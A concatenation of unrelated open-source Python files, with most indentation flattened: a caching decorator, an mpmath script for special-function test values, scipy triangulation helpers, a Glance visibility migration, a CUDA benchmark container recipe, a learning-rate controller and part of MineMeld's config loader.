_get_now(),
sorting_key_function,
rounding=binary_search.LOW
)
if almost_cutting_point is not None:
cutting_point = almost_cutting_point + 1
for key in list(cached._cache.keys())[:cutting_point]:
del cached._cache[key]
@misc_tools.set_attributes(_cache=OrderedDict())
def cached(function, *args, **kwargs):
remove_expired_entries()
sleek_call_args = \
SleekCallArgs(cached._cache, function, *args, **kwargs)
try:
return cached._cache[sleek_call_args][0]
except KeyError:
value = function(*args, **kwargs)
cached._cache[sleek_call_args] = (
value,
_get_now() + time_to_keep
)
cached._cache.sort(key=sorting_key_function)
return value
else: # not time_to_keep
@misc_tools.set_attributes(_cache={})
def cached(function, *args, **kwargs):
sleek_call_args = \
SleekCallArgs(cached._cache, function, *args, **kwargs)
try:
return cached._cache[sleek_call_args]
except KeyError:
cached._cache[sleek_call_args] = value = \
function(*args, **kwargs)
return value
else: # max_size < infinity
@misc_tools.set_attributes(_cache=OrderedDict())
def cached(function, *args, **kwargs):
sleek_call_args = \
SleekCallArgs(cached._cache, function, *args, **kwargs)
try:
result = cached._cache[sleek_call_args]
cached._cache.move_to_end(sleek_call_args)
return result
except KeyError:
cached._cache[sleek_call_args] = value = \
function(*args, **kwargs)
if len(cached._cache) > max_size:
cached._cache.popitem(last=False)
return value
result = decorator_(cached, function)
def cache_clear(key=CLEAR_ENTIRE_CACHE):
if key is CLEAR_ENTIRE_CACHE:
cached._cache.clear()
else:
try:
del cached._cache[key]
except KeyError:
pass
result.cache_clear = cache_clear
result.is_cached = True
return result
return decorator
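# A minimal usage sketch of the `cache` decorator defined above; it relies only
# on behaviour documented in the docstring (argument-aware caching and the
# `cache_clear` attribute) and runs only when this module is executed directly.
if __name__ == '__main__':
    @cache(max_size=10)
    def slow_double(x):
        print('computing %s' % (x,))
        return 2 * x

    print(slow_double(21))    # computed and cached
    print(slow_double(x=21))  # same call signature, served from the cache
    slow_double.cache_clear()
    print(slow_double(21))    # recomputed after clearing the cache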
|
src/Tools/PythonScripts/ComputeSpecialFunctionsTestValues.py
|
MyIntelligenceAgency/infer
| 1,416 |
75568
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the MIT license.
# See the LICENSE file in the project root for more information.
"""A script to evaluate test values for special functions in high precision.
This script looks for .csv files in /test/Tests/Data/SpecialFunctionsValues.
These files are expected to contain sets of arguments and expected result values
for some special functions.
Whenever the script encounters a file for which it has a defined function,
it evaluates that function for every set of arguments present in that file
and replaces the expected result in the file with the one it computed,
except for infinite or NaN results, which are preserved.
The .csv files are expected to have a header of the form
arg0,arg1,...,argN,expectedresult
to use a comma as the value separator, a dot as the decimal separator, and
"Infinity", "-Infinity", and "NaN" to designate the corresponding values.
The correspondence between file names and functions is set in the pair_info
dictionary within the script.
To add a new test case, add a new row to the csv file using zero for the expectedresult.
Then run this script to replace the dummy value.
"""
from __future__ import division
import os
import csv
from mpmath import *
import time
mp.pretty = True
mp.dps = 500
output_dps = 50
def normal_cdf_moment_ratio(n, x):
if x < 0:
return power(2, -0.5 - n / 2) * hyperu(n / 2 + 0.5, 0.5, x * x / 2)
return exp(x * x / 4) * pcfu(0.5 + n, -x)
def normal_cdf2(x, y, r):
"""
This function produces correct results for inputs currently present in /test/Tests/Data/SpecialFunctionsValues.
Other inputs may fall into regions where the algorithms used here produce incorrect results and may require modifying this function.
"""
if x == -inf or y == -inf:
return mpf('0')
if x == inf:
return ncdf(y)
if y == inf:
return ncdf(x)
if r == mpf('1'):
return ncdf(min(x, y))
if r == mpf('-1'):
if x <= -y:
return mpf('0')
elif x > y:
return ncdf(y) - ncdf(-x)
else:
return ncdf(x) - ncdf(-y)
if abs(y) > abs(x):
z = x
x = y
y = z
# Avoid quadrature with r < 0 since it is sometimes inaccurate.
if r < 0 and x - y < 0:
# phi(x,y,r) = phi(inf,y,r) - phi(-x,y,-r)
# phi(x,y,r) = phi(x,inf,r) - phi(x,-y,-r)
return ncdf(x) - normal_cdf2(x, -y, -r)
if x > 0 and -x + y <= 0:
return ncdf(y) - normal_cdf2(-x,y,-r)
if x + y > 0:
# phi(x,y,r) = phi(-x,-y,r) + phi(x,y,-1)
return normal_cdf2(-x, -y, r) + normal_cdf2(x,y,-1)
def f(t):
if abs(t) == mpf('1'):
# When t = -1, (x*x+y*y-2*t*x*y) = (x+y)^2 >= 0
# When t = 1, (x*x+y*y-2*t*x*y) = (x-y)^2 >= 0
return mpf('0')
omt2 = (1 - t) * (1 + t)
return 1 / (2 * pi * sqrt(omt2)) * exp(-(x * x + y * y - 2 * t * x * y) / (2 * omt2))
omr2 = (1+r)*(1-r)
ymrx = y - r*x
def f2(t):
return npdf(t - x) * normal_cdf((ymrx + r*t)/omr2)
# This integral excludes normal_cdf2(x,y,-1)
# which will be zero when x+y <= 0
result, err = safe_quad(f, [-1, r])
if mpf(10)**output_dps * abs(err) > abs(result):
result, err = safe_quad(f2, [0, inf])
if mpf(10)**output_dps * abs(err) > abs(result):
print(f"Suspiciously big error when evaluating an integral for normal_cdf2({nstr(x)}, {nstr(y)}, {nstr(r)}).")
print(f"Integral: {nstr(result)}")
print(f"Integral error estimate: {nstr(err)}")
return result
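# Sanity check (illustrative, not exercised by the script): with zero
# correlation the two events are independent, so
#     normal_cdf2(mpf('0'), mpf('0'), mpf('0'))
# should evaluate to ncdf(0) * ncdf(0) = 0.25.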
def safe_quad(f, points):
verbose=False
# get a quick estimate of the result
estimate = quad(f, points, maxdegree=1, verbose=verbose)
if verbose:
print(f"Rescaling integrand by {nstr(1/estimate)}")
result, err = quad(lambda x: f(x)/estimate, points, error=True, verbose=verbose)
result *= estimate
err *= estimate
if mpf(10)**output_dps * abs(err) > abs(result):
estimate = result
if verbose:
print(f"Rescaling integrand by {nstr(1/estimate)}")
result, err = quad(lambda x: f(x)/estimate, points, error=True, verbose=verbose)
result *= estimate
err *= estimate
return result, err
def normal_cdf2_ln(x, y, r):
return ln(normal_cdf2(x, y, r))
def normal_cdf2_ratio_ln(x, y, r, sqrtomr2):
if sqrtomr2 < 0.618:
omr2 = sqrtomr2*sqrtomr2
r = sign(r)*sqrt(1 - omr2)
else:
omr2 = 1-r*r
return normal_cdf2_ln(x, y, r) + (x*x+y*y-2*r*x*y)/2/omr2 + log(2*pi)
def logistic_gaussian(m, v):
if m == inf:
if v == inf:
return inf
return mpf('1.0')
if v == inf:
return mpf('0.5')
logEpsilon = log(eps)
if 2*m + 4*v < logEpsilon:
return mpf(exp(m + v/2) * (1 - exp(m + 1.5 * v) * (1 - exp(m + 2.5 * v))))
tanhm = tanh(m)
# Not really a precise threshold, but fine for our data
if tanhm == mpf('1.0'):
return tanhm
# The integration routine below is obtained by substituting x = atanh(t)*sqrt(v)
# into the definition of logistic_gaussian
#
# f = lambda x: mpmath.exp(-(x - mmpf) * (x - mmpf) / (2 * vmpf)) / (1 + mpmath.exp(-x))
# result = 1 / mpmath.sqrt(2 * mpmath.pi * vmpf) * mpmath.quad(f, [-mpmath.inf, mpmath.inf])
#
# Such substitution makes mpmath.quad call much faster.
# mpmath.quad uses exponential spacing between quadrature points, so we want the transformation to grow like log(x).
sqrtv = sqrt(v)
misqrtv = m/sqrtv
scale = max(10, m + sqrtv)/sqrtv
def f(t):
x = scale*atanh(t)
return exp(-(x - misqrtv) ** 2 / 2) / (1 + exp(-x*sqrtv)) / (1 - t * t)
coef = scale / sqrt(2 * pi)
points = [-1, 0, 1]
int, err = safe_quad(f, points)
result = coef * int
if mpf(10)**output_dps * abs(err) > abs(int):
print(f"Suspiciously big error when evaluating an integral for logistic_gaussian({nstr(m)}, {nstr(v)}).")
print(f"Integral: {nstr(int)}")
print(f"integral error estimate: {nstr(err)}")
print(f"Coefficient: {nstr(coef)}")
print(f"Result (Coefficient * Integral): {nstr(result)}")
return result
def logistic_gaussian_deriv(m, v):
if m == inf or m == -inf or v == inf:
return mpf('0.0')
# The integration routine below is obtained by substituting x = atanh(t)
# into the definition of logistic_gaussian'
#
# f = lambda x: mpmath.exp(-(x - mmpf) * (x - mmpf) / (2 * vmpf)) / ((1 + mpmath.exp(-x)) * (1 + mpmath.exp(x)))
# result = 1 / mpmath.sqrt(2 * mpmath.pi * vmpf) * mpmath.quad(f, [-mpmath.inf, mpmath.inf])
#
# Such substitution makes mpmath.quad call much faster.
def f(t):
one_minus_t_squared = 1 - t * t
return exp(-(atanh(t) - m) ** 2 / (2 * v)) / (one_minus_t_squared + sqrt(one_minus_t_squared))
coef = 0.5 / sqrt(2 * pi * v)
int, err = safe_quad(f, [-1, 1])
result = coef * int
if mpf(10)**output_dps * abs(err) > abs(int):
print(f"Suspiciously big error when evaluating an integral for logistic_gaussian'({m}, {v}).")
print(f"Integral: {int}")
print(f"integral error estimate: {err}")
print(f"Coefficient: {coef}")
print(f"Result (Coefficient * Integral): {result}")
return result
def logistic_gaussian_deriv2(m, v):
if m == inf or m == -inf or v == inf or m == mpf(0):
return mpf(0)
# The integration routine below is obtained by substituting x = atanh(t)
# into the definition of logistic_gaussian''
#
# def f(x):
# expx = mpmath.exp(x)
# one_plus_expx = 1 + expx
# return mpmath.exp(-(x - mmpf) * (x - mmpf) / (2 * vmpf)) * (1 - expx) / ((1 + mpmath.exp(-x)) * one_plus_expx * one_plus_expx)
# coef = 1 / mpmath.sqrt(2 * mpmath.pi * vmpf)
# int = mpmath.quad(f, [-mpmath.inf, mpmath.inf])
# result = coef * int
#
# Such substitution makes mpmath.quad call much faster.
def f(t):
one_minus_t = 1 - t
one_minus_t_squared = 1 - t * t
sqrt_one_minus_t_squared = sqrt(one_minus_t_squared)
return exp(-(atanh(t) - m) ** 2 / (2 * v)) * (one_minus_t - sqrt_one_minus_t_squared) / ((one_minus_t_squared + sqrt_one_minus_t_squared) * (one_minus_t + sqrt_one_minus_t_squared))
coef = 0.5 / sqrt(2 * pi * v)
int, err = safe_quad(f, [-1, 1])
result = coef * int
if mpf(10)**output_dps * abs(err) > abs(int):
print(f"Suspiciously big error when evaluating an integral for logistic_gaussian''({m}, {v}).")
print(f"Integral: {nstr(int)}")
print(f"integral error estimate: {nstr(err)}")
print(f"Coefficient: {nstr(coef)}")
print(f"Result (Coefficient * Integral): {nstr(result)}")
return result
def normal_cdf(x):
"""
An alternate way of computing ncdf that avoids the bugs in ncdf
"""
return 0.5 * gammainc(0.5, x * x / 2, inf) / gamma(0.5)
def normal_pdf_ln(x):
return -x * x / 2 - log(sqrt(2 * pi))
def normal_cdf_integral(x, y, r):
if x == -inf or y == -inf:
return mpf('0.0')
if x == inf:
return inf
if y == inf:
result = normal_cdf2(x, y, r)
if x > 0:
return result * x + exp(normal_pdf_ln(x) - log(ncdf(x)))
else:
return result * normal_cdf_moment_ratio(mpf('1.0'), x) * exp(normal_pdf_ln(x) - log(ncdf(x)))
if r == mpf(1):
if x <= y:
return normal_cdf_moment_ratio(mpf('1.0'), x) * exp(normal_pdf_ln(x))
else:
npdfy = exp(normal_pdf_ln(y))
return (normal_cdf_moment_ratio(mpf('1.0'), y) + (x - y) * ncdf(y) / npdfy) * npdfy
if r == mpf(-1):
if x + y <= 0:
return mpf(0)
else:
return x * normal_cdf2(x, y, r) + npdf(x) - npdf(y)
# This area separation works well for inputs currently present in /test/Tests/Data/SpecialFunctionsValues
# Other inputs may require making this more accurate
if x > 0 and y > 0 and 1 + r < mpf('1e-12'):
return normal_cdf_integral(x, y, -1) - normal_cdf_integral(-x, -y, r)
omr2 = (1-r)*(1+r)
sqrtomr2 = sqrt(omr2)
# This is accurate when x >= 0 and r >= 0
if True: #x >= 0 and r >= 0:
return x * normal_cdf2(x, y, r) + exp(normal_pdf_ln(x) + log(ncdf((y - r * x) / sqrtomr2))) + r * exp(normal_pdf_ln(y) + log(ncdf((x - r * y) / sqrtomr2)))
# try quadrature on the integral definition
def f(t):
return t * npdf(t - x) * normal_cdf((y - r*(x-t))/omr2)
result, err = safe_quad(f, [0, inf])
if mpf(10)**output_dps * abs(err) > abs(result):
print(f"Suspiciously big error when evaluating an integral for normal_cdf_integral({x}, {y}, {r}).")
print(f"Integral: {nstr(result)}")
print(f"integral error estimate: {nstr(err)}")
return result
def normal_cdf_integral_ratio(x, y, r):
int_z = normal_cdf_integral(x, y, r)
if int_z == mpf(0):
return int_z
z = normal_cdf2(x, y, r)
return int_z / z
def beta_cdf(x, a, b):
if x <= 0:
return 0
if x >= 1:
return 1
return betainc(a, b, 0, x, regularized=True)
pair_info = {
'BesselI.csv': besseli,
'BetaCdf.csv': beta_cdf,
'Digamma.csv': digamma,
'Erfc.csv': erfc,
'ExpMinus1.csv': expm1,
'ExpMinus1RatioMinus1RatioMinusHalf.csv': lambda x: ((exp(x) - 1) / x - 1) / x - 0.5 if x != mpf(0) else mpf(0),
'Gamma.csv': gamma,
'GammaLn.csv': loggamma,
'GammaLnSeries.csv': lambda x: loggamma(x) - (x-0.5)*log(x) + x - 0.5*log(2*pi),
'GammaLower.csv': lambda s, x: gammainc(s, 0, x, regularized=True) if s != inf else mpf(0),
'GammaUpper.csv': lambda s, x: gammainc(s, x, inf),
'GammaUpperRegularized.csv': lambda s, x: gammainc(s, x, inf, regularized=True) if s != inf else mpf(1),
'GammaUpperScale.csv' : lambda s, x: x ** s * exp(-x) / gamma(s),
'Log1MinusExp.csv': lambda x: log(1 - exp(x)),
'Log1Plus.csv': log1p,
'LogExpMinus1.csv': lambda x: log(exp(x) - 1),
'Logistic.csv': lambda x: 1 / (1 + exp(-x)),
'logisticGaussian.csv': logistic_gaussian,
'logisticGaussianDeriv.csv': logistic_gaussian_deriv,
'logisticGaussianDeriv2.csv': logistic_gaussian_deriv2,
'LogisticLn.csv': lambda x: -log(1 + exp(-x)),
'LogSumExp.csv': lambda x, y: log(exp(x) + exp(y)),
'NormalCdf.csv': ncdf,
'NormalCdf2.csv': normal_cdf2,
'NormalCdfIntegral.csv': normal_cdf_integral,
'NormalCdfIntegralRatio.csv': normal_cdf_integral_ratio,
'NormalCdfInv.csv': lambda x: -sqrt(mpf(2)) * erfinv(1 - 2 * x),
'NormalCdfLn.csv': lambda x: log(ncdf(x)),
'NormalCdfLn2.csv': normal_cdf2_ln,
'NormalCdfLogit.csv': lambda x: log(ncdf(x)) - log(ncdf(-x)),
'NormalCdfMomentRatio.csv': normal_cdf_moment_ratio,
'NormalCdfRatioLn2.csv': normal_cdf2_ratio_ln,
'Tetragamma.csv': lambda x: polygamma(2, x),
'Trigamma.csv': lambda x: polygamma(1, x),
'XMinusLog1Plus.csv': lambda x: x - log(1+x),
}
def float_str_csharp_to_python(s):
return s.replace('NaN', 'nan').replace('Infinity', 'inf')
def float_str_python_to_csharp(s):
return s.replace('nan', 'NaN').replace('inf', 'Infinity')
dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', '..', 'test', 'Tests', 'data', 'SpecialFunctionsValues')
with os.scandir(dir) as it:
for entry in it:
if entry.name.endswith('.csv') and entry.is_file():
print(f'Processing {entry.name}...')
if entry.name not in pair_info.keys() or pair_info[entry.name] == None:
print("Don't know how to process. Skipping.")
continue
f = pair_info[entry.name]
with open(entry.path) as csvfile:
reader = csv.DictReader(csvfile, delimiter=',')
fieldnames = reader.fieldnames
arg_count = len(fieldnames) - 1
newrows = []
for row in reader:
if entry.name == 'NormalCdfRatioLn2.csv':
sqrtomr2 = mpf(float_str_csharp_to_python(row['arg3']))
r = mpf(float_str_csharp_to_python(row['arg2']))
if sqrtomr2 < 0.618:
row['arg2'] = nstr(sign(r)*sqrt(1-sqrtomr2*sqrtomr2), output_dps)
newrow = dict(row)
args = []
for i in range(arg_count):
args.append(mpf(float_str_csharp_to_python(row[f'arg{i}'])))
result_in_file = row['expectedresult']
verbose = True
if result_in_file == 'Infinity' or result_in_file == '-Infinity' or result_in_file == 'NaN':
newrow['expectedresult'] = result_in_file
else:
try:
if verbose:
print(f'{entry.name}{args}')
startTime = time.time()
result = f(*args)
if verbose:
elapsed = time.time() - startTime
print(f'({elapsed} seconds elapsed)')
nprint(result, output_dps)
except ValueError:
print(f'ValueError for args {args}. Setting result to NaN.')
result = mpf('nan')
newrow['expectedresult'] = float_str_python_to_csharp(nstr(result, output_dps))
newrows.append(newrow)
with open(entry.path, 'w', newline='') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames, delimiter=',')
writer.writeheader()
writer.writerows(newrows)
|
src/compas/geometry/triangulation/delaunay_numpy.py
|
XingxinHE/compas
| 235 |
75602
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
from numpy import asarray
from scipy.spatial import Voronoi
from scipy.spatial import Delaunay
__all__ = [
'delaunay_from_points_numpy',
'voronoi_from_points_numpy',
]
def delaunay_from_points_numpy(points):
"""Computes the delaunay triangulation for a list of points using Numpy.
Parameters
----------
points : sequence of tuple
XYZ coordinates of the original points.
Returns
-------
list
The faces of the triangulation.
Each face is a triplet of indices referring to the list of point coordinates.
Examples
--------
>>>
"""
xyz = asarray(points)
d = Delaunay(xyz[:, 0:2])
return d.simplices
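# Usage sketch (illustrative input): the four corners of a unit square
# triangulate into two faces, each a triplet of indices into the input list.
#     faces = delaunay_from_points_numpy(
#         [[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [1.0, 1.0, 0.0], [0.0, 1.0, 0.0]])
#     assert len(faces) == 2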
def voronoi_from_points_numpy(points):
"""Generate a voronoi diagram from a set of points.
Parameters
----------
points : list of list of float
XYZ coordinates of the voronoi sites.
Returns
-------
scipy.spatial.Voronoi
The Voronoi diagram of the input points.
Examples
--------
>>>
"""
points = asarray(points)
voronoi = Voronoi(points)
return voronoi
|
text/SST/params_fit.py
|
laura-rieger/deep-explanation-penalization
| 105 |
75606
|
<reponame>laura-rieger/deep-explanation-penalization
import numpy as np
from numpy.random import randint
class p:
train_both = True # whether to train just one model or both
sparse_signal = False # train on incorrect data points or not
signal_strength = 1.0 # how much to weight kl-divergence
starting_folder = '../models/init_models/' # folder that store initial models
num_iters = 3 # how many epochs to train for
seed = 42 # random seed
bias = ""
out_dir = '../models/trained_models/' # directory to save to
# exporting ########
pid = ''.join(["%s" % randint(0, 9) for num in range(0, 20)])
def _str(self):
vals = vars(p)
return 'pid=' + vals['pid']
def _dict(self):
return {attr: val for (attr, val) in vars(p).items()
if not attr.startswith('_')}
|
glance/db/sqlalchemy/alembic_migrations/data_migrations/ocata_migrate01_community_images.py
|
daespinel/glance
| 309 |
75612
|
<gh_stars>100-1000
# Copyright 2016 Rackspace
# Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from sqlalchemy import MetaData, select, Table, and_, not_
def has_migrations(engine):
"""Returns true if at least one data row can be migrated.
There are rows left to migrate if:
#1 There exists a row with visibility not set yet.
Or
#2 There exists a private image with active members but its visibility
isn't set to 'shared' yet.
Note: This method can return a false positive if data migrations
are running in the background as it's being called.
"""
meta = MetaData(engine)
images = Table('images', meta, autoload=True)
rows_with_null_visibility = (select([images.c.id])
.where(images.c.visibility == None)
.limit(1)
.execute())
if rows_with_null_visibility.rowcount == 1:
return True
image_members = Table('image_members', meta, autoload=True)
rows_with_pending_shared = (select([images.c.id])
.where(and_(
images.c.visibility == 'private',
images.c.id.in_(
select([image_members.c.image_id])
.distinct()
.where(not_(image_members.c.deleted))))
)
.limit(1)
.execute())
if rows_with_pending_shared.rowcount == 1:
return True
return False
def _mark_all_public_images_with_public_visibility(images):
migrated_rows = (images
.update().values(visibility='public')
.where(images.c.is_public)
.execute())
return migrated_rows.rowcount
def _mark_all_non_public_images_with_private_visibility(images):
migrated_rows = (images
.update().values(visibility='private')
.where(not_(images.c.is_public))
.execute())
return migrated_rows.rowcount
def _mark_all_private_images_with_members_as_shared_visibility(images,
image_members):
migrated_rows = (images
.update().values(visibility='shared')
.where(and_(images.c.visibility == 'private',
images.c.id.in_(
select([image_members.c.image_id])
.distinct()
.where(not_(image_members.c.deleted)))))
.execute())
return migrated_rows.rowcount
def _migrate_all(engine):
meta = MetaData(engine)
images = Table('images', meta, autoload=True)
image_members = Table('image_members', meta, autoload=True)
num_rows = _mark_all_public_images_with_public_visibility(images)
num_rows += _mark_all_non_public_images_with_private_visibility(images)
num_rows += _mark_all_private_images_with_members_as_shared_visibility(
images, image_members)
return num_rows
def migrate(engine):
"""Set visibility column based on is_public and image members."""
return _migrate_all(engine)
|
_solved/solutions/case-trump-vote09.py
|
DuongVit/scipy2018-geospatial-data
| 333 |
75616
|
f = plt.figure(figsize=(6,6))
plt.scatter(pres.swing_full, lp.weights.lag_spatial(w, pres.swing_full))
plt.plot((-.3,.1),(-.3,.1), color='k')
plt.title('$I = {:.3f} \ \ (p < {:.3f})$'.format(moran.I,moran.p_sim))
|
recipes/examples/scif.py
|
robertmaynard/hpc-container-maker
| 340 |
75618
|
<filename>recipes/examples/scif.py<gh_stars>100-1000
"""
Build the CUDA-STREAM benchmark for multiple CUDA compute capabilities.
Make each build available as a SCI-F application.
"""
Stage0 += baseimage(image='nvcr.io/nvidia/cuda:9.1-devel-centos7', _as='devel')
# Install the GNU compiler
Stage0 += gnu(fortran=False)
# Install SCI-F
Stage0 += pip(packages=['scif'], upgrade=True)
# Download a single copy of the source code
Stage0 += packages(ospackages=['ca-certificates', 'git'])
Stage0 += shell(commands=['cd /var/tmp',
'git clone --depth=1 https://github.com/bcumming/cuda-stream.git cuda-stream'])
# Build CUDA-STREAM as a SCI-F application for each CUDA compute capability
for cc in ['35', '60', '70']:
binpath = '/scif/apps/cc{}/bin'.format(cc)
stream = scif(name='cc{}'.format(cc))
stream += comment('CUDA-STREAM built for CUDA compute capability {}'.format(cc))
stream += shell(commands=['nvcc -std=c++11 -ccbin=g++ -gencode arch=compute_{0},code=\\"sm_{0},compute_{0}\\" -o {1}/stream /var/tmp/cuda-stream/stream.cu'.format(cc, binpath)])
stream += environment(variables={'PATH': '{}:$PATH'.format(binpath)})
stream += label(metadata={'COMPUTE_CAPABILITY': cc})
stream += shell(commands=['stream'], _test=True)
stream += runscript(commands=['stream'])
Stage0 += stream
# Runtime stage
Stage1 += baseimage(image='nvcr.io/nvidia/cuda:9.1-base-centos7')
# Install SCI-F
Stage1 += pip(packages=['scif'], upgrade=True)
# Install runtime components from the first stage
Stage1 += Stage0.runtime()
|
utils/training/learning_rate_controller.py
|
sundogrd/tensorflow_end2end_speech_recognition
| 351 |
75633
|
<filename>utils/training/learning_rate_controller.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-
"""Decay learning rate per epoch."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class Controller(object):
"""Controll learning rate per epoch.
Args:
learning_rate_init: A float value, the initial learning rate
decay_start_epoch: int, the epoch to start decay
decay_rate: A float value, the rate to decay the current learning rate
decay_patient_epoch: int, decay learning rate if results have not been
improved for 'decay_patient_epoch'
lower_better: If True, the lower, the better.
If False, the higher, the better.
worst_value: A float value, the worst value of the evaluation metric
"""
def __init__(self, learning_rate_init, decay_start_epoch, decay_rate,
decay_patient_epoch=1, lower_better=True, worst_value=1):
self.learning_rate_init = learning_rate_init
self.decay_start_epoch = decay_start_epoch
self.decay_rate = decay_rate
self.decay_patient_epoch = decay_patient_epoch
self.not_improved_epoch = 0
self.lower_better = lower_better
self.best_value = worst_value
def decay_lr(self, learning_rate, epoch, value):
"""Decay learning rate per epoch.
Args:
learning_rate: A float value, the current learning rate
epoch: int, the current epoch
value: A value to evaluate
Returns:
learning_rate_decayed: A float value, the decayed learning rate
"""
if not self.lower_better:
value *= -1
if epoch < self.decay_start_epoch:
if value < self.best_value:
# Update
self.best_value = value
return learning_rate
if value < self.best_value:
# Improved
self.best_value = value
self.not_improved_epoch = 0
return learning_rate
elif self.not_improved_epoch < self.decay_patient_epoch:
# Not improved, but the learning rate will not be decayed yet
self.not_improved_epoch += 1
return learning_rate
else:
# Not improved, and learning rate will be decayed
self.not_improved_epoch = 0
learning_rate_decayed = learning_rate * self.decay_rate
return learning_rate_decayed
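# Usage sketch: decay by 0.5 once the monitored dev loss stops improving for
# one epoch, starting from epoch 5. The loss values below are illustrative and
# the block runs only when this module is executed directly.
if __name__ == '__main__':
    controller = Controller(learning_rate_init=1e-3, decay_start_epoch=5,
                            decay_rate=0.5, decay_patient_epoch=1)
    lr = controller.learning_rate_init
    for epoch, dev_loss in enumerate([1.0, 0.9, 0.8, 0.8, 0.8, 0.8, 0.8]):
        lr = controller.decay_lr(lr, epoch, dev_loss)
        print(epoch, lr)  # the learning rate is halved at epoch 6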
|
minemeld/run/config.py
|
dreilly1982/minemeld-core
| 147 |
75646
|
<reponame>dreilly1982/minemeld-core<gh_stars>100-1000
# Copyright 2015 Palo Alto Networks, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import time
import os
import os.path
import logging
import shutil
import re
import json
import multiprocessing
import functools
from collections import namedtuple
import yaml
import gevent.core
import minemeld.loader
__all__ = ['load_config', 'validate_config', 'resolve_prototypes']
# disables construction of timestamp objects
yaml.SafeLoader.add_constructor(
u'tag:yaml.org,2002:timestamp',
yaml.SafeLoader.construct_yaml_str
)
LOG = logging.getLogger(__name__)
COMMITTED_CONFIG = 'committed-config.yml'
RUNNING_CONFIG = 'running-config.yml'
PROTOTYPE_ENV = 'MINEMELD_PROTOTYPE_PATH'
MGMTBUS_NUM_CONNS_ENV = 'MGMTBUS_NUM_CONNS'
FABRIC_NUM_CONNS_ENV = 'FABRIC_NUM_CONNS'
CHANGE_ADDED = 0
CHANGE_DELETED = 1
CHANGE_INPUT_ADDED = 2
CHANGE_INPUT_DELETED = 3
CHANGE_OUTPUT_ENABLED = 4
CHANGE_OUTPUT_DISABLED = 5
_ConfigChange = namedtuple(
'_ConfigChange',
['nodename', 'nodeclass', 'change', 'detail']
)
_Config = namedtuple(
'_Config',
['nodes', 'fabric', 'mgmtbus', 'changes']
)
class MineMeldConfigChange(_ConfigChange):
def __new__(_cls, nodename, nodeclass, change, detail=None):
return _ConfigChange.__new__(
_cls,
nodename=nodename,
nodeclass=nodeclass,
change=change,
detail=detail
)
class MineMeldConfig(_Config):
def as_nset(self):
result = set()
for nname, nvalue in self.nodes.iteritems():
result.add(
json.dumps(
[nname, nvalue.get('class', None)],
sort_keys=True
)
)
return result
def compute_changes(self, oconfig):
if oconfig is None:
# oconfig is None, mark everything as added
for nodename, nodeattrs in self.nodes.iteritems():
self.changes.append(
MineMeldConfigChange(nodename=nodename, nodeclass=nodeattrs['class'], change=CHANGE_ADDED)
)
return
my_nset = self.as_nset()
other_nset = oconfig.as_nset()
deleted = other_nset - my_nset
added = my_nset - other_nset
untouched = my_nset & other_nset
# mark deleted nodes as deleted
for snode in deleted:
nodename, nodeclass = json.loads(snode)
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_DELETED,
detail=oconfig.nodes[nodename]
)
self.changes.append(change)
# mark added as added
for snode in added:
nodename, nodeclass = json.loads(snode)
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_ADDED
)
self.changes.append(change)
# check inputs/output for untouched
for snode in untouched:
nodename, nodeclass = json.loads(snode)
my_inputs = set(self.nodes[nodename].get('inputs', []))
other_inputs = set(oconfig.nodes[nodename].get('inputs', []))
iadded = my_inputs - other_inputs
ideleted = other_inputs - my_inputs
for i in iadded:
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_INPUT_ADDED,
detail=i
)
self.changes.append(change)
for i in ideleted:
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=CHANGE_INPUT_DELETED,
detail=i
)
self.changes.append(change)
my_output = self.nodes[nodename].get('output', False)
other_output = oconfig.nodes[nodename].get('output', False)
if my_output == other_output:
continue
change_type = CHANGE_OUTPUT_DISABLED
if my_output:
change_type = CHANGE_OUTPUT_ENABLED
change = MineMeldConfigChange(
nodename=nodename,
nodeclass=nodeclass,
change=change_type
)
self.changes.append(change)
@classmethod
def from_dict(cls, dconfig=None):
if dconfig is None:
dconfig = {}
fabric = dconfig.get('fabric', None)
if fabric is None:
fabric_num_conns = int(
os.getenv(FABRIC_NUM_CONNS_ENV, 50)
)
fabric = {
'class': 'ZMQRedis',
'config': {
'num_connections': fabric_num_conns,
'priority': gevent.core.MINPRI # pylint:disable=E1101
}
}
mgmtbus = dconfig.get('mgmtbus', None)
if mgmtbus is None:
mgmtbus_num_conns = int(
os.getenv(MGMTBUS_NUM_CONNS_ENV, 10)
)
mgmtbus = {
'transport': {
'class': 'ZMQRedis',
'config': {
'num_connections': mgmtbus_num_conns,
'priority': gevent.core.MAXPRI # pylint:disable=E1101
}
},
'master': {},
'slave': {}
}
nodes = dconfig.get('nodes', None)
if nodes is None:
nodes = {}
return cls(nodes=nodes, fabric=fabric, mgmtbus=mgmtbus, changes=[])
def _load_node_prototype(protoname, paths):
proto_module, proto_name = protoname.rsplit('.', 1)
pmodule = None
pmprotos = {}
for p in paths:
pmpath = os.path.join(p, proto_module+'.yml')
try:
with open(pmpath, 'r') as pf:
pmodule = yaml.safe_load(pf)
if pmodule is None:
pmodule = {}
except IOError:
pmodule = None
continue
pmprotos = pmodule.get('prototypes', {})
